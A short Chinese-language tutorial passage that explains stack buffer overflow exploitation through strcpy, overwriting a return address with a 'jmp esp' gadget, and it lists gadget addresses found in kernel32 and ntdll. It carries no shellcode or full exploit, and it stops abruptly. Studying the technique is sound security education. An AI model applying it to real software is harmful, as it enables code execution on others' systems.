通過前面的學習,我們進一步利用了strcpy的未檢查數據長度機制進行各種操作。
但是,如果我們的程序是動態的加載,可能會造成shellcode不能執行成功,即跳轉到錯誤的位置。
這時候,我們就想利用程序本身的功能來完成這個,我們想到了jmp esp
淹沒返回地址為jmp esp
使用插件收縮jmp esp或call esp
1 0027762F Location found: call esp in [unknown] 2 00277A0D Location found: call esp in [unknown] 3 00277A17 Location found: call esp in [unknown] 4 003010C8 Location found: call esp in [unknown] 5 00305028 Location found: jmp esp in [unknown] 6 76D7B543 Location found: call esp in [unknown] 7 7C8369F0 Location found: call esp in kernel32.text 8 9 7C86467B Location found: jmp esp in kernel32.text 10 11 7C868667 Location found: call esp in kernel32.text 12 7C934663 Location found: call esp in ntdll.text 13 7C97311B Location found: call esp in ntdll.text 14 7FFA4512 Location found: jmp esp in [unknown] 15 7FFA54CD Location found: jmp esp in [unknown] 16 13 addresses found, 0 filtered
我們選擇一個來作為跳轉
淹沒了esp后的數據
然后通過jmp esp使程序執行這些代碼。
對應的
